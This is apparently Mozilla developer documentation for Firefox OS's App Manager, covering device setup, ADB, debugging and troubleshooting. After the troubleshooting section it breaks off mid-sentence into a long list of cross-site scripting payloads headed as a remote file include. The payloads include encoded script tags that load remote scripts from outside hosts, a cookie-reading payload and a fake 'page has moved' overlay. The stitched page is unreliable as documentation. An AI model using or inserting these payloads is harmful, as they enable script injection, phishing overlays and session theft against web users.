<div class="summary">
<p><span class="seoSummary">The App Manager is a tool for Firefox Desktop which provides a number of useful tools to help developers test, deploy and debug HTML5 web apps on Firefox OS phones & Simulator, directly from Firefox browser. This page documents how to use the App Manager.</span></p>
<p>App Manager is available for Firefox OS 1.2 or later, lower versions are supported in <a href="/en-US/docs/Tools/Firefox_OS_1.1_Simulator">Firefox OS 1.1 Simulator</a>. The App Manager is being replaced by the <a href="/en-US/docs/Tools/WebIDE">WebIDE</a>, starting from Firefox 33. The WebIDE provides all the features of the App Manager and also features an editing environment to create and develop Firefox OS apps.</p>
</div>
<p>{{EmbedYouTube("z1Bxg1UJVf0")}}</p>
<p>The App Manager is composed of:</p>
<ul>
<li>An <a href="#Apps_panel"><em>Apps panel</em></a>, which manages local apps (app source code located on your computer) and apps hosted externally, allowing you to package and install them on your device or simulator, and debug them using Toolboxes</li>
<li>A <a href="#Device_panel"><em>Device panel</em></a>, which displays information about the connected device including Firefox OS version installed, permissions required for using device APIs on the device, and apps installed</li>
<li><a href="/en-US/docs/Tools_Toolbox"><em>Toolboxes</em></a>, which are are sets of developer tools (web console, inspector, debugger, etc.) that can be connected to a running app via the Apps panel to perform debugging operations</li>
</ul>
<h2 id="Quick_setup"><a name="Configuring_device">Quick setup</a></h2>
<p>This section is designed to get you up and running as soon as possible; if you need some more detail please skip forward to the {{ anch("Device and system configuration") }} section and start reading from there. Also see the {{ anch("Troubleshooting") }} section for help if you are having trouble.</p>
<ol>
<li>Make sure you have Firefox Desktop 26+ installed</li>
<li>Open the App Manager (in the URL bar, type <code>about:app-manager</code>, or go to <em>Tools > Web Developer > App Manager</em> in your Firefox menu.) This should appear in a new browser tab.</li>
<li>If you don't have a real device:
<ol>
<li><a href="https://ftp.mozilla.org/pub/mozilla.org/labs/fxos-simulator/">Install the Firefox OS Simulator</a> add-on, then go back to the App Manager tab of your browser.</li>
<li>In App Manager's bottom toolbar, click on <em>Start Simulator</em>, then click on the name of the installed simulator, which should appear there.</li>
</ol>
</li>
<li>If you have a real device:
<ol>
<li>Make sure your device is running Firefox OS 1.2+</li>
<li>On Windows, make sure to install the drivers provided by your phone manufacturer</li>
<li>In the Settings of your device, disable Screen Lock (<code>Settings > Phone lock > <code>Lock Screen</code></code>) and enable Remote Debugging (<code>Settings > Device information > More information > Developer</code>)</li>
<li><a href="https://ftp.mozilla.org/pub/mozilla.org/labs/fxos-simulator/">Install the ADB Helper</a> add-on in Firefox Desktop</li>
<li>Connect your device to your machine via a USB cable</li>
<li>You should see the name of your device in the App Manager's bottom bar. Click on it.</li>
</ol>
</li>
<li>The bottom bar should show "Connected to: xxx"</li>
<li>Click on the <em>Apps</em> panel and add an app (packaged or hosted)</li>
<li>The <em>Refresh</em> button validates your app and installs it on the Simulator/Device</li>
<li>The <em>Debug</em> button connects the developer tools to the running app</li>
<li><strong>See the {{ anch("Troubleshooting") }} section for help if you are having trouble</strong></li>
</ol>
<h2 id="Device_and_system_configuration">Device and system configuration</h2>
<p>The first thing you'll need to do when using the App Manager is make sure your system and phone are set up correctly. This section will run through all the steps required.</p>
<h3 id="Firefox_OS_1.2_required">Firefox OS 1.2+ required</h3>
<p>Make sure your device is running Firefox OS 1.2/Boot2Gecko 1.2 or higher. To check which version of Firefox OS the device is runing, go to <code>Settings > Device Information > Software</code>.</p>
<p>If you don't have a high enough version installed, depending on what phone you have you will need to either install an available nightly build of Firefox 1.2+, or configure and build it yourself from source.</p>
<p>Builds available:</p>
<ul>
<li><a href="http://downloads.geeksphone.com/">Geeksphone Keon/Peak builds</a> (to find out more about using these, read <a href="/en-US/docs/Mozilla/Firefox_OS/Developer_phone_guide/Updating_and_Tweaking_Geeksphone">Updating and Tweaking your Firefox OS Developer Preview phone/Geeksphone</a>)</li>
<li>More to follow</li>
</ul>
<div class="note">
<p><strong>Note</strong>: To build your own Firefox OS 1.2+ distribution, follow the instructions located at <a href="/en-US/docs/Mozilla/Firefox_OS/Building_and_installing_Firefox_OS">Building and installing Firefox OS</a>, starting with <a href="/en-US/docs/Mozilla/Firefox_OS/Firefox_OS_build_prerequisites">Firefox OS build prerequisites</a>.</p>
</div>
<h3 id="Remote_debugging">Remote debugging</h3>
<p>Next, you need to enable remote debugging in Firefox OS. To do so, go to <code>Settings > Device information > More information > Developer</code> and check the Remote Debugging checkbox.</p>
<h3 id="Adb_Helper_Add-on" name="Adb_Helper_Add-on">ADB or ADB helper</h3>
<p>The process uses the Android Debug Bridge (ADB) to handle the device-computer connection and communication. There are two options for running ADB:</p>
<ul>
<li>
<p>Let Firefox handle ADB (recommended). <a href="https://ftp.mozilla.org/pub/mozilla.org/labs/fxos-simulator/">Install the ADB Helper add-on</a>, which makes the process easier. With this installed, there's no need to install the ADB, and no need to type the <code>adb forward</code> command: everything is handled by the add-on.</p>
{{DownloadButton("https://ftp.mozilla.org/pub/mozilla.org/labs/fxos-simulator/", "Download ADB Helper Add-on")}}</li>
<li>Use ADB manually. You need to have it installed on your computer: download and install <code>adb</code> as explained in <a href="/en-US/Firefox_OS/Debugging/Installing_ADB">Installing ADB</a>. You'll need to enable port forwarding by entering the following command into your terminal:
<pre>
adb forward tcp:6000 localfilesystem:/data/local/debugger-socket</pre>
Note that you'll need to do this every time the phone is restarted or unplugged then re-plugged.</li>
</ul>
<div class="note">
<p><strong>Note</strong>: There's no need to run this command if you installed the ADB Helper Add-on.</p>
</div>
<h2 id="Connecting_your_device_to_the_App_Manager">Connecting your device to the App Manager</h2>
<p>With all your configuration done, it's now time to plug your device into your computer and start the App Manager:</p>
<ol>
<li>Plug the device into your computer via USB.</li>
<li>Disable Screen lock on your device by going to <code>Settings > Screen Lock</code> and unchecking the <code>Lock Screen</code> checkbox. This is a good idea because when the screen gets locked, the phone connection gets lost, meaning it is no longer available for debugging.</li>
<li>Start the App Manager — In Firefox Desktop select the <code>Tools > Web Developer > App Manager</code> menu option, or type <code>about:app-manager</code> in the URL bar.</li>
<li>At the bottom of the App Manager tab, you will see a connection status bar (see screenshot below). You should be able to connect your device by clicking the "Connect to localhost:6000" button.</li>
<li>If this works successfully, a prompt should appear on your device: "An incoming request to permit remote debugging connection was detected. Allow connection?". Tap the OK button (You may also have to press the power button on the phone so you can see the prompt.) The connection status bar should update to say "Connected to B2G", with a Disconnect button available to press if you want to cancel the connection.</li>
</ol>
<p><img alt="" src="https://mdn.mozillademos.org/files/6263/connection-status.png" style="display:block; height:30px; margin:0px auto; width:600px" /></p>
<div class="note">
<p><strong>Note</strong>: The other controls in the connection status bar allow you to connect a simulator to the App Manager, which we cover in the next section, below, and change the port that the connection happens on. If you change the port, you'll also need to enable port forwarding for this port as well, as instructed in the {{anch("Enable port forwarding")}} section, above.</p>
</div>
<h2 id="Using_a_Firefox_OS_Simulator_Add-on"><a name="Simulator">Using a Firefox OS Simulator Add-on</a></h2>
<p>If you haven't got a real device available to use with App Manager, you can still try it out using a <a href="/en-US/docs/Tools/Firefox_OS_Simulator">Firefox OS Simulator</a> Add-on. To start off, install the simulator with the following button (multiple versions are available; you are advised to install them all, for maximum flexibility):</p>
<p>{{DownloadButton("https://ftp.mozilla.org/pub/mozilla.org/labs/fxos-simulator/", "Install Simulator")}}</p>
<p>Once you've installed the simulator(s), you need to go to about:app-manager to see the connection status bar at the bottom of the App Manager tab, and click the "Start simulator" button. At least three buttons will appear:</p>
<ul>
<li>"Firefox OS 1.3", "Firefox OS 1.2" ... etc. (or something similar): the left-most buttons contain the names of the simulator versions you have installed. Click one to start a connection to a simulator.</li>
<li>"Add": the middle button navigates to the simulator install links in this article, so you can add more Simulators (Firefox OS 1.3, Firefox OS 1.4, etc.)</li>
<li>"Cancel": the right hand button cancels the connection.</li>
</ul>
<div class="note">
<p><strong>Note</strong>: The Firefox OS 1.5 Simulator has been removed, as 1.5 was changed to 2.0. If you have the Firefox OS 1.5 Simulator installed, it won't automatically update to 2.0, so you should uninstall 1.5 and install 2.0 instead. The Firefox OS 2.0 simulator will then automatically update.</p>
</div>
<div class="note">
<p><strong>Note</strong>: The Firefox OS 1.2 Simulator has been removed, as no phones are likely to be released with version 1.2 installed — this version is therefore of limited value, and it makes more sense to spend your time debugging on other versions.</p>
</div>
<h2 id="Running_custom_builds_in_the_App_Manager">Running custom builds in the App Manager</h2>
<p>Note that you can run custom B2G Desktop and Gaia/Gecko builds in the App Manager via the simulator. Read <a href="/en-US/Firefox_OS/Running_custom_builds_in_the_App_Manager">Running custom Firefox OS/Gaia builds in the App Manager</a> for instructions on how to do this.</p>
<h2 id="Apps_panel_Test_and_debug_Firefox_OS_apps"><a name="Apps_panel">Apps panel</a>: Test and debug Firefox OS apps</h2>
<p>Now that everything is working, let's review the functionality available inside the App Manager, starting with the Apps panel. From here, you can import an existing app to push onto your device, for testing and debugging:</p>
<ul>
<li>To install a locally stored app, click on the plus next to the "Add Packaged App" label and use the resulting file chooser dialog to select the directory your app is contained inside.</li>
<li>To install an externally hosted app, enter the absolute URL of the app's manifest file into the text field inside the "Add Hosted App" box, then press the plus button.</li>
</ul>
<p>Information about your app should appear on the right hand side of the window, as seen below:</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6261/apps-panel.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<h3 id="Manifest_editor">Manifest editor</h3>
<p>From Firefox 28 onwards, the Apps Panel includes an editor for the app manifest:</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6613/apps-panel-fx-28.png" style="display:block; margin:0px auto; width:600px" /></p>
<h3 id="Debugging">Debugging</h3>
<p>Clicking on <em>"Update"</em> will update (install) the app on the device. Clicking on <em>"debug"</em> will connect a toolbox to the app, allowing you to debug its code directly:</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6265/debug.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<div class="note">
<p>You'll enjoy playing around with the toolbox — try altering the DOM, CSS etc. and you'll see the updates reflected on the device in realtime. Such updates will be saved on the installed app code; you'll see them next time you open the app on the device.</p>
</div>
<p>Before Firefox 28, the tools are launched in a separate window. From Firefox 28 onwards, the tools are launched in a separate tab in the App Manager itself, alongside the Apps and Device tabs. The tab is given your app's icon so it's easy to find:</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6615/toolbox-fx-28.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<h3 id="Errors">Errors</h3>
<p>If an app was not added successfully — for example if the URL was incorrect, or you selected a packaged app folder — an entry will be added to the page for this app, but this will include error information.</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6259/apps-error.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<p>You can also delete an app from this view, by hovering over the App name/description on the left of the window, and pressing the "X" button that appears in each case. This however doesn't remove the app from the device. To do that you need to manually remove the app using the device itself.</p>
<h2 id="Device_panel_2"><a name="Device_panel">Device panel</a></h2>
<p>The <em>Device</em> tab displays information about the connected device. From the <em>"</em>Installed Apps<em>"</em> window, apps on the device can be started and debugged.</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6267/device-tab.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<div class="note">
<p>Note: Certified Apps are not listed by default. <a href="#Debugging_Certified_Apps">See how to debug certified apps</a>.</p>
</div>
<p><a name="permissions"></a>The "Permissions" window shows the required privileges for different <a href="/en-US/docs/WebAPI">Web APIs</a> on the current device:</p>
<p><img alt="" src="https://mdn.mozillademos.org/files/6269/permissions.png" style="display:block; height:375px; margin:0px auto; width:600px" /></p>
<p>Finally, you can take a screenshot of the current device display by clicking the "Screenshot" button. The screenshot appears in a new tab on Firefox, and from there you can save or discard it as you wish.</p>
<h2 id="Debugging_Certified_Apps_2"><a name="Debugging_Certified_Apps">Debugging Certified Apps</a></h2>
<p>Currently only devices running a development build of Firefox OS 1.2+ are capable of debugging certified apps. If you have a development build, you can enable certified app debugging by changing the pref <code>devtools.debugger.forbid-certified-apps</code> to <code>false</code> in your profile. To do this, follow the steps below:</p>
<h3 id="Using_a_real_device">Using a real device</h3>
<ol>
<li>
<p>On your computer, enter the following command in Terminal/console to enter your device's filesystem via the shell:</p>
<pre class="brush: bash">
adb shell</pre>
<p>Your prompt should change to <code>root@android</code>.</p>
</li>
<li>
<p>Next, stop B2G running using the following command:</p>
<pre class="brush: bash">
stop b2g</pre>
</li>
<li>
<p>Navigate to the following directory:</p>
<pre>
cd /data/b2g/mozilla/*.default/</pre>
</li>
<li>
<p>Here, update the prefs.js file with the following line:</p>
<pre class="brush: js">
echo 'user_pref("devtools.debugger.forbid-certified-apps", false);' >> prefs.js</pre>
</li>
<li>
<p>After you've finished editing and saving the file, start B2G again using the following command:</p>
<pre class="brush: bash">
start b2g</pre>
</li>
<li>
<p>Exit the android filesystem using the <code>exit</code> command; this will return you to your normal terminal prompt.</p>
</li>
<li>
<p>Next, reconnect to the App Manager and you should see certified apps appear for debugging.</p>
</li>
</ol>
<h3 id="Using_the_B2G_desktop_client">Using the B2G desktop client</h3>
<p class="brush: js">With the B2G desktop client, the preference is already defined in your profile in <code>greprefs.js</code>, located at the root of your B2G desktop client folder. Stop your B2G desktop client and edit the file to turn the <code>devtools.debugger.forbid-certified-apps</code> preference to <code>false</code>. Then restart the B2G client and connect the App Manager. You should now see all applications.</p>
<div class="note">
<p>Note: If you want to add this preference to your Gaia build you can run <code>make DEVICE_DEBUG=1 reset-gaia</code>.</p>
</div>
<h2 id="Troubleshooting_2"><a name="Troubleshooting">Troubleshooting</a></h2>
<p id="My_device_is_not_recognized">If the device is not recognized:</p>
<ul>
<li>If clicking the button corresponding to your Firefox OS phone doesn't do anything, make sure you haven't connected an Android phone at the same time as the Firefox OS phone to your computer.</li>
<li>Read the <a href="#Configuring_device">Device and system configuration</a> section thoroughly, and make sure all the steps are followed:</li>
<li>Is your device running at least Firefox OS 1.2?</li>
<li>Don't see all the apps? Do you need to enable <a href="#Debugging_Certified_Apps">Certified Apps debugging</a>?</li>
<li>Did you enable "Remote Debugging" in the settings of your phone?</li>
<li>If you are not using the <a href="#Adb_Helper_Add-on">ADB Helper add-on</a>:
<ul>
<li>Did you successfully run the <code>adb forward</code> command?</li>
</ul>
</li>
<li>If you are using the <a href="#Adb_Helper_Add-on">ADB Helper add-on</a> and your device is not listed in the bottom toolbar:
<ul>
<li>If you use Linux, <a href="http://developer.android.com/tools/device.html#setting-up">make sure to setup udev correctly</a></li>
<li>If you use Windows, <a href="http://developer.android.com/tools/device.html#setting-up">make sure to install the appropriate drivers</a></li>
<li>You can also enable verbose logging to gather diagnostics:
<ul>
<li>Use about:config to set the pref "<span class="message"><span class="content"><span class="email">extensions.adbhelper@mozilla.org.sdk</span>.console.logLevel"</span></span> to the string value "all"</li>
<li>Disable and re-enable the ADB Helper add-on from the add-ons manager, or restart Firefox</li>
<li>Open the App Manager again</li>
<li>In the <a href="/docs/Tools/Browser_Console">Browser Console</a>, you should now see additional output lines that mention "adbhelper"</li>
<li>If you see them but aren't sure what they mean, stop by the <a href="https://wiki.mozilla.org/DevTools/GetInvolved#Communication">#devtools room on IRC</a> or <a href="https://bugzilla.mozilla.org/enter_bug.cgi?alias=&assigned_to=nobody%40mozilla.org&attach_text=&blocked=&bug_file_loc=http%3A%2F%2F&bug_ignored=0&bug_severity=normal&bug_status=NEW&cf_blocking_b2g=---&cf_crash_signature=&cf_status_b2g18=---&cf_status_b2g_1_1_hd=---&cf_status_b2g_1_2=---&cf_status_firefox24=---&cf_status_firefox25=---&cf_status_firefox26=---&cf_status_firefox27=---&cf_status_firefox_esr17=---&cf_status_firefox_esr24=---&cf_tracking_b2g18=---&cf_tracking_firefox24=---&cf_tracking_firefox25=---&cf_tracking_firefox26=---&cf_tracking_firefox27=---&cf_tracking_firefox_esr17=---&cf_tracking_firefox_esr24=---&cf_tracking_firefox_relnote=---&cf_tracking_relnote_b2g=---&comment=&component=Developer%20Tools%3A%20App%20Manager&contenttypeentry=&contenttypemethod=autodetect&contenttypeselection=text%2Fplain&data=&defined_groups=1&dependson=&description=&flag_type-203=X&flag_type-37=X&flag_type-41=X&flag_type-5=X&flag_type-607=X&flag_type-720=X&flag_type-721=X&flag_type-737=X&flag_type-748=X&flag_type-781=X&flag_type-787=X&flag_type-791=X&flag_type-799=X&flag_type-800=X&flag_type-802=X&flag_type-803=X&flag_type-809=X&flag_type-825=X&form_name=enter_bug&keywords=&maketemplate=Remember%20values%20as%20bookmarkable%20template&op_sys=All&priority=--&product=Firefox&qa_contact=developer.tools%40firefox.bugs&rep_platform=x86&requestee_type-203=&requestee_type-41=&requestee_type-5=&requestee_type-607=&requestee_type-748=&requestee_type-781=&requestee_type-787=&requestee_type-791=&requestee_type-800=&short_desc=&status_whiteboard=&target_milestone=---&version=Trunk">file a bug</a> with the log output</li>
</ul>
</li>
</ul>
</li>
<li>See <strong>"???????"</strong> instead of the device name on Linux? You have permissions issues. <a href="http://developer.android.com/tools/device.html#setting-up">Make sure to setup udev correctly</a>.</li>
<li>Is your phone screen unlocked?</li>
<li>If the command "adb devices" shows no entries even though the phone is connected and unlocked, you may have to <a href="http://blog.fh-kaernten.at/wehr/?p=1182">edit adb_usb.ini</a>.</li>
</ul>
<p>Can't connect your device to the App Manager or start the simulator? <a href="https://wiki.mozilla.org/DevTools/GetInvolved#Communication">Let us know</a> or <a href="https://bugzilla.mozilla.org/enter_bug.cgi?alias=&assigned_to=nobody%40mozilla.org&attach_text=&blocked=&bug_file_loc=http%3A%2F%2F&bug_ignored=0&bug_severity=normal&bug_status=NEW&cf_blocking_b2g=---&cf_crash_signature=&cf_status_b2g18=---&cf_status_b2g_1_1_hd=---&cf_status_b2g_1_2=---&cf_status_firefox24=---&cf_status_firefox25=---&cf_status_firefox26=---&cf_status_firefox27=---&cf_status_firefox_esr17=---&cf_status_firefox_esr24=---&cf_tracking_b2g18=---&cf_tracking_firefox24=---&cf_tracking_firefox25=---&cf_tracking_firefox26=---&cf_tracking_firefox27=---&cf_tracking_firefox_esr17=---&cf_tracking_firefox_esr24=---&cf_tracking_firefox_relnote=---&cf_tracking_relnote_b2g=---&comment=&component=Developer%20Tools%3A%20App%20Manager&contenttypeentry=&contenttypemethod=autodetect&contenttypeselection=text%2Fplain&data=&defined_groups=1&dependson=&description=&flag_type-203=X&flag_type-37=X&flag_type-41=X&flag_type-5=X&flag_type-607=X&flag_type-720=X&flag_type-721=X&flag_type-737=X&flag_type-748=X&flag_type-781=X&flag_type-787=X&flag_type-791=X&flag_type-799=X&flag_type-800=X&flag_type-802=X&flag_type-803=X&flag_type-809=X&flag_type-825=X&form_name=enter_bug&keywords=&maketemplate=Remember%20values%20as%20bookmarkable%20template&op_sys=All&priority=--&product=Firefox&qa_contact=developer.tools%40firefox.bugs&rep_platform=x86&requestee_type-203=&requestee_type-41=&requestee_type-5=&requestee_type-607=&requestee_type-748=&requestee_type-781=&requestee_type-787=&requestee_type-791=&requestee_type-800=&short_desc=&status_whiteboard=&target_milestone=---&version=Trunk">file a bug</a>. and</p>
/* Remote File Include with HTML TAGS via XSS.Cx */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-javascript-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-http-header-injection-signatures-only-fools-dont-use.txt */
/* INCLUDE:URL http://xss.cx/examples/ultra-low-hanging-fruit/no-experience-required-css-injection-signatures-only-fools-dont-use.txt */
/* Updated September 29, 2014 */
/* RFI START */
<img language=vbs src=<b onerror=alert#1/1#>
<isindex action="javas	cript:alert(1)" type=image>
"]<img src=1 onerror=alert(1)>
<input/type="image"/value=""`<span/onmouseover='confirm(1)'>X`</span>
<svg[U+000B]onload=alert(1)>
<iframe/name="javascript:confirm(1);"onload="while(1){eval(name);}">
<cite><a href="javascript:confirm(1);">XSS cited!</a></cite>
<svg/onload=window.onerror=alert;throw/XSS/;//
<video src="x" onloadstart="alert(1)">
<a href="javascript:data:alert(1)">click</a>
<a href="javascript://%0d(0===0&&1==1)%0c?alert(1):confirm(2)">click</a>
<div style='x:anytext/**/xxxx/**/n(alert(1)) ("\"))))))expressio\")'>aa</div>
<%%%>
<meta charset=iso-2022-jp><%1B(Jd%1B(Ji%1B(Jv><i%1B(Jm%1B(Jg s%1B(Jr%1B(Jc%1B(J=%1B(Jx o%1B(Jn%1B(Jer%1B(Jr%1B(Jo%1B(Jr%1B(J=%1B(Ja%1B(Jl%1B(Je%1B(Jr%1B(Jt(1)//%1B(J<%1B(J/%1B(Jd%1B(Jiv%1B(J>%1B(J
<!-- Hello -- world > <SCRIPT>confirm(1)</SCRIPT> -->
<! XSS="><img src=xx:x onerror=confirm(1)//">
"; ||confirm('XSS') || "
<? echo('<SCR)';
"/> <img src='aaa' onerror=confirm(document.domain)>
/> <img src='aaa' onerror=confirm(document.domain)>
<!-- --!><input value="--><body/onload=`confirm(4)//`">
<!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:confirm(*num*)>*num*</a>
//|\\ <script //|\\ src='http://xss.cx/xss.js'> //|\\ </script //|\\
<
<
>
>
<
<
>
>
<
<
>
>
<
<
>
>
�</form><input type="date" onfocus="confirm(1)">
<
<
>
>
%2522%253E%253Csvg%2520onload%3D%2522confirm(7)%2522%253E
%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E
%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E
%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E
"%25prompt(9)%25"
"%26%26prompt(9)%26%26"
%26lt%3bscript>
"%26prompt(9)%26"
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
<3 </3
"><h1/onmouseover='\u0061lert(1)'>%00
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
%3C
%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%2399%3Bri%26%23112%3Bt%2520s%26%23114%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cs%26%23x63%3Bri%26%23x70%3Bt%2520s%26%23x72%3Bc%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
%3Cdiv%20style%3Dposition%3Afixed%3Btop%3A0px%3Bleft%3A0px%3Bbackground%2Dcolor%3A%23FFFFFF%3Bwidth%3A100%25%3Bheight%3A100%25%3Btext%2Dalign%3Acenter%3Bz%2Dindex%3A11%3B%20%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ca%20href%3D%3Fxss%3D%253Cscript%2520src%253D%252F%252Fxy%252Ehn%252Fa%252Ejs%2520%253E%253C%252Fscript%253E%3EThe%20requested%20page%20has%20moved%20here%3C%2Fa%3E%3C%2Fdiv%3E
%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fx%26%23116%3Bxs%26%2399%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E
%3Cs%26%2399%3Bri%26%23112%3Bt%20s%26%23114%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E
%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3D%2F%2Fxy%2Ehn%2Fa%2Ejs%20%3E%3C%2Fs%26%23x63%3B%26%23x72%3Bi%26%23x70%3Bt%3E
%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fxs%26%23s63%3B.cx%2Fxss%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{confirm%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
%3E
[4076*A]<img src="x" alt="[0x8F]" test=" onerror=confirm(1)//">
<
<
>
>
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
<A """><IMG SRC="javascript:confirm(1)">
"'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF
"'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF
<A/HREF="javascript:confirm(1)">
<B <SCRIPT>confirm(1)</SCRIPT>>
<BASE HREF="javascript:confirm('XSS');//">
<BGSOUND SRC="javascript:confirm('XSS');">
<BODY BACKGROUND="javascript:confirm('XSS')">
<BODY ONLOAD=confirm('XSS')>
<BR SIZE="&{confirm('XSS')}">
<B="<SCRIPT>confirm(1)</SCRIPT>">
<DIV STYLE="background-image: url(javascript:confirm(5))">
<DIV STYLE="background-image: url(javascript:confirm(5))">
<DIV STYLE="width: expression(confirm(5));">
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80confirm(1)%E3%B0%80/script%E3%B8%80
<FRAMESET><FRAME RC=""+"javascript:confirm(5);"></FRAMESET>
<FRAMESET><FRAME SRC="javascript:confirm(5);"></FRAMESET>
>
>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-confirm(5);+ADw-/SCRIPT+AD4-
<HTML><BODY>
<IFRAME SRC="javascript:confirm(5);"></IFRAME>
<IFRAME%20src='javascript:confirm%26%23x25;281)'>
<![><IMG ALT="]><SCRIPT>confirm(1)</SCRIPT>">
<IMG ALT="><SCRIPT>confirm(1)</SCRIPT>"(EOF)
<IMG DYNSRC="javascript:confirm(document.location)">
<IMG LOWSRC="javascript:confirm(document.location)">
<IMG SRC="  javascript:confirm(document.location);">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:confirm(document.location)>
<IMG SRC=JaVaScRiPt:confirm("XSS<WBR>")>
<IMG SRC=JaVaScRiPt:prompt(document.location)>
<IMG SRC="jav ascript:confirm(document.location);">
<IMG SRC=java%00script:confirm(document.location)>
<IMG SRC=`javascript:confirm(1)`>
<IMG SRC=javascript:confirm(String.fromCharCode(88,83,83))>
<IMG SRC=`javascript:confirm(document.cookie)`>
<IMG SRC="javascript:confirm(document.location)"
<IMG SRC="javascript:confirm(document.location);">
<IMG SRC=javascript:confirm(document.location)>
